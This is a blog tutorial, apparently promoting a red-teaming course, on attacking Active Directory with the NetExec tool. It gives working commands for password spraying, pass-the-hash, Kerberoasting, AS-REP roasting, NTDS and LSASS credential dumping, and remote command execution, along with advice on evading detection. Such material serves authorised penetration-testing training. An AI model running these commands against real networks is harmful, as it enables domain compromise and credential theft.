NetExec for Red Teamers: The Modern Toolkit for Active Directory Exploitation

Active Directory remains the backbone of enterprise identity management, and for red teamers, it remains the most lucrative attack surface in any engagement. With the deprecation of CrackMapExec's active development and the community rallying around its spiritual successor, NetExec (nxc) has become the go-to framework for offensive AD operations. This post walks through how red teamers can leverage NetExec from initial enumeration all the way through lateral movement and credential harvesting.

What Is NetExec and Why It Replaced CrackMapExec

NetExec is an open-source, actively maintained network exploitation tool built for pentesting Windows and Active Directory environments at scale. It supports multiple protocols including SMB, WinRM, LDAP, MSSQL, RDP, FTP, and SSH, making it a multi-vector offensive platform rather than just a pass-the-hash utility.

The project was forked from CrackMapExec after its development stalled, and the community has since added meaningful improvements: better module stability, updated Impacket dependencies, improved Kerberos support, and cleaner output formatting. If you are still running engagements with old CME builds, you are leaving capability on the table.

Install NetExec with:

pip install netexec


[cta]

Or from source for the latest build:

git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
pip install -e .


[cta]

Verify the install:

nxc --version


[cta]

SMB Enumeration: Building Your Target Picture

SMB is your first handshake with a Windows environment. NetExec makes it trivial to sweep an entire subnet and understand what you are dealing with before touching a single exploit.

Host Discovery and OS Fingerprinting

nxc smb 192.168.1.0/24


[cta]

This single command returns hostnames, IP addresses, operating system versions, SMB signing status, and domain membership. The SMB signing column is particularly important: hosts with signing disabled are candidates for NTLM relay attacks.

Null Session and Anonymous Enumeration

Before you even have credentials, check for misconfigured shares and null session access:

nxc smb 192.168.1.10 -u '' -p '' --shares


[cta]

nxc smb 192.168.1.10 -u 'guest' -p '' --shares


[cta]

If anonymous authentication succeeds, enumerate users and groups via RPC:

nxc smb 192.168.1.10 -u '' -p '' --users
nxc smb 192.168.1.10 -u '' -p '' --groups


[cta]

This kind of pre-credential enumeration is something a lot of junior practitioners skip. If you want to go deeper on structuring your AD recon phase properly, the Windows Red Teaming course at Redfox Cybersecurity Academy covers the full methodology from initial access through domain dominance.

Credential Validation and Password Spraying at Scale

Once you have a user list, whether from null sessions, OSINT, or a phishing payload, NetExec makes credential testing fast and protocol-flexible.

Validating a Single Credential Pair

nxc smb 192.168.1.0/24 -u 'jsmith' -p 'Password123!'


[cta]

A green [+] indicates valid credentials. A (Pwn3d!) tag means you have local admin access on that host.

Password Spraying with Lockout Awareness

nxc smb 192.168.1.0/24 -u users.txt -p 'Winter2024!' --continue-on-success


[cta]

Always use --continue-on-success during sprays so NetExec does not stop at the first hit. Pair this with LDAP to check the domain password policy before you spray:

nxc ldap 192.168.1.5 -u 'jsmith' -p 'Password123!' --pass-pol


[cta]

This returns the lockout threshold, observation window, and minimum password age. Spraying without this information is how you cause an outage and get caught in the same move.

Hash-Based Authentication: Pass the Hash

When you have an NTLM hash from secretsdump, Mimikatz, or a captured relay, you do not need to crack it to use it:

nxc smb 192.168.1.0/24 -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c'


[cta]

This is a core lateral movement technique. NetExec will flag every host where that hash grants local admin, giving you your next pivot point instantly.

LDAP Enumeration: Pulling the Domain Apart

LDAP is where the real intelligence gathering happens. NetExec's LDAP module surfaces domain structure, user attributes, group memberships, and misconfigurations that would take hours to find manually.

Enumerating Domain Users and Attributes

nxc ldap 192.168.1.5 -u 'jsmith' -p 'Password123!' --users


[cta]

To pull users with the DONT_REQ_PREAUTH flag set, which makes them vulnerable to AS-REP Roasting:

nxc ldap 192.168.1.5 -u 'jsmith' -p 'Password123!' --asreproast asrep_hashes.txt


[cta]

Those hashes can then be cracked offline with Hashcat:

hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt


[cta]

Kerberoasting via NetExec

Service accounts with SPNs registered are targets for Kerberoasting. NetExec can request and dump the TGS tickets in one command:

nxc ldap 192.168.1.5 -u 'jsmith' -p 'Password123!' --kerberoasting kerb_hashes.txt


[cta]

Crack with Hashcat using mode 13100 for RC4-encrypted tickets:

hashcat -m 13100 kerb_hashes.txt /usr/share/wordlists/rockyou.txt --force


[cta]

Understanding why these attacks work requires knowing how Kerberos authentication is structured. The Windows Red Teaming course at Redfox Cybersecurity Academy breaks down Kerberos delegation, ticket structure, and attack chains in a way that makes the tooling make sense rather than just cargo-culting commands.

Bloodhound Data Collection via LDAP

NetExec has a built-in BloodHound collection module that pulls AD object relationships and formats them for BloodHound ingestion:

nxc ldap 192.168.1.5 -u 'jsmith' -p 'Password123!' --bloodhound --collection All


[cta]

This generates ZIP files you can drag directly into the BloodHound interface to visualize attack paths to Domain Admin.

Finding LAPS Passwords

Local Administrator Password Solution stores randomized local admin passwords in AD. If your current user has read access to those attributes, NetExec can retrieve them:

nxc ldap 192.168.1.5 -u 'jsmith' -p 'Password123!' --laps


[cta]

Each LAPS password returned is an immediate local admin credential for the corresponding machine. This is a high-value find in almost every enterprise environment.

SMB Modules: Credential Dumping and Post-Exploitation

NetExec's module system extends its capabilities far beyond authentication testing. The following are modules every red teamer should have in their standard workflow.

Dumping SAM, LSA, and NTDS

With local admin on a Windows target, you can dump credential material directly:

nxc smb 192.168.1.20 -u 'Administrator' -p 'Password123!' --sam


[cta]

nxc smb 192.168.1.20 -u 'Administrator' -p 'Password123!' --lsa


[cta]

For domain controllers, dump NTDS to get every domain account hash:

nxc smb 192.168.1.5 -u 'Administrator' -p 'Password123!' --ntds


[cta]

The NTDS dump is the crown jewel of any AD engagement. With every domain hash in hand, you can authenticate as any account in the environment, perform pass-the-hash across the board, or crack high-value accounts offline.

Running Commands via SMB and WinRM

When you have admin credentials, you can execute commands directly on remote hosts without touching RDP:

nxc smb 192.168.1.20 -u 'Administrator' -p 'Password123!' -x 'whoami /all'


[cta]

For PowerShell execution:

nxc smb 192.168.1.20 -u 'Administrator' -p 'Password123!' -X 'Get-LocalGroupMember Administrators'


[cta]

WinRM offers a more stable command execution channel on hosts where it is enabled:

nxc winrm 192.168.1.20 -u 'Administrator' -p 'Password123!' -X 'systeminfo'


[cta]

The Lsassy Module for In-Memory Credential Extraction

The lsassy module uses remote process dumping techniques to extract credentials from LSASS memory without dropping Mimikatz on disk:

nxc smb 192.168.1.20 -u 'Administrator' -p 'Password123!' -M lsassy


[cta]

This is significantly more OPSEC-friendly than traditional LSASS dumping. Lsassy supports multiple dump methods and can target specific processes to avoid AV triggers.

Enumerating Logged-On Users and Sessions

Understanding who is logged on to which machine is critical for targeting. Hunting for a DA session gives you a path to credential theft without touching the DC directly:

nxc smb 192.168.1.0/24 -u 'jsmith' -p 'Password123!' --loggedon-users


[cta]

nxc smb 192.168.1.0/24 -u 'jsmith' -p 'Password123!' --sessions


[cta]

MSSQL Lateral Movement with NetExec

SQL Server instances in enterprise environments are frequently over-privileged and directly linked to lateral movement opportunities that SMB-focused operators miss entirely.

Authenticating to MSSQL Instances

nxc mssql 192.168.1.30 -u 'sa' -p 'Password123!'


[cta]

Executing OS Commands via xp_cmdshell

If xp_cmdshell is enabled or you have sysadmin privileges to enable it:

nxc mssql 192.168.1.30 -u 'sa' -p 'Password123!' -x 'whoami'


[cta]

NetExec handles enabling xp_cmdshell automatically when it detects sufficient privileges. This converts a SQL authentication into full OS-level command execution, which is a pivot technique that bypasses many network segmentation controls because SQL traffic is often whitelisted between application and database tiers.

MSSQL Linked Server Abuse

Many environments chain SQL servers together via linked server configurations. NetExec can enumerate these:

nxc mssql 192.168.1.30 -u 'sa' -p 'Password123!' -M mssql_priv


[cta]

Linked servers often cross trust boundaries, allowing you to hop from a low-privilege SQL instance to a privileged one in a different network segment.

Kerberos Authentication with NetExec

For environments where NTLM is restricted or you want to avoid leaving NTLM authentication events in logs, NetExec supports full Kerberos authentication.

Using a TGT Cache File

After obtaining a TGT with tools like getTGT.py from Impacket:

python3 getTGT.py domain.local/jsmith:Password123!
export KRB5CCNAME=jsmith.ccache
nxc smb 192.168.1.5 -u 'jsmith' -p '' -k --use-kcache


[cta]

Authenticating with a Kerberos Ticket

nxc smb 192.168.1.5 --kerberos -u 'jsmith' -p 'Password123!' -d 'domain.local'


[cta]

Operating via Kerberos is an important OPSEC consideration on mature engagements. NTLM authentication generates specific Event IDs that blue teams monitor closely. Kerberos-based lateral movement blends into normal domain traffic more effectively.

If your goal is to operate like a real threat actor rather than just run tools, understanding the detection landscape alongside the offensive techniques is covered thoroughly in the Windows Red Teaming course at Redfox Cybersecurity Academy.

OPSEC Considerations When Using NetExec

NetExec is loud by default. Every failed authentication attempt, share enumeration, and remote command execution generates Windows event logs, network metadata, and potentially EDR alerts. Here are practices that reduce your footprint.

• Target selectively. Sweeping entire subnets with authentication attempts is a fast path to detection. Use passive discovery first (responder, LLMNR poisoning, packet capture) to build a targeted host list before you authenticate against anything.
• Control concurrency. NetExec defaults to multiple threads. Use --threads 1 during sensitive phases to slow your authentication rate and avoid triggering authentication flood detections.
• Use local admin hashes, not domain admin. Authenticating everywhere as Domain Admin is a massive alert trigger. Use local admin credentials for lateral movement and only elevate to domain credentials when necessary.
• Prefer WinRM over SMB for command execution. WinRM-based execution generates different and sometimes less scrutinized log entries depending on the target's SIEM configuration.

Clean up. If you use the --sam or --ntds modules, the VSS shadow copy created during dumping should be noted in your report and cleaned up during remediation guidance.

Chaining NetExec Into a Full Attack Path

A realistic engagement flow might look like this:

1. Discover live hosts and SMB signing status via an unauthenticated sweep.
2. Identify null session access or guest authentication on shares.
3. Extract a user list from RPC or LDAP.
4. Check domain password policy via LDAP.
5. Spray one password against the user list.
6. Use valid credentials to run BloodHound collection.
7. Identify kerberoastable accounts and AS-REP roastable users.
8. Crack hashes offline and authenticate with the recovered credentials.
9. Enumerate logged-on users across all hosts to find privileged sessions.
10. Use lsassy on the target host to extract in-memory credentials.
11. Pass the hash for the recovered account across all hosts.
12. Dump NTDS on the DC when you reach Domain Admin.

Each of these steps maps directly to a NetExec command or module. The tool is not just a credential validator; it is a complete operational framework for AD engagements.

Key Takeaways

NetExec has firmly established itself as the professional standard for Active Directory offensive tooling. Its protocol breadth, module system, and active community development make it the right choice for red teamers who need reliable, repeatable results across varied enterprise environments.

The difference between operators who use NetExec effectively and those who do not is not familiarity with the syntax; it is understanding the underlying protocols, authentication mechanisms, and AD trust relationships that make each technique work. Tools are only as effective as the knowledge behind them.

Redfox Cybersecurity Academy's Windows Red Teaming course is built for practitioners who want that depth. It covers Active Directory attack chains, lateral movement techniques, privilege escalation, and detection evasion in a structured, hands-on format designed for real-world engagement readiness.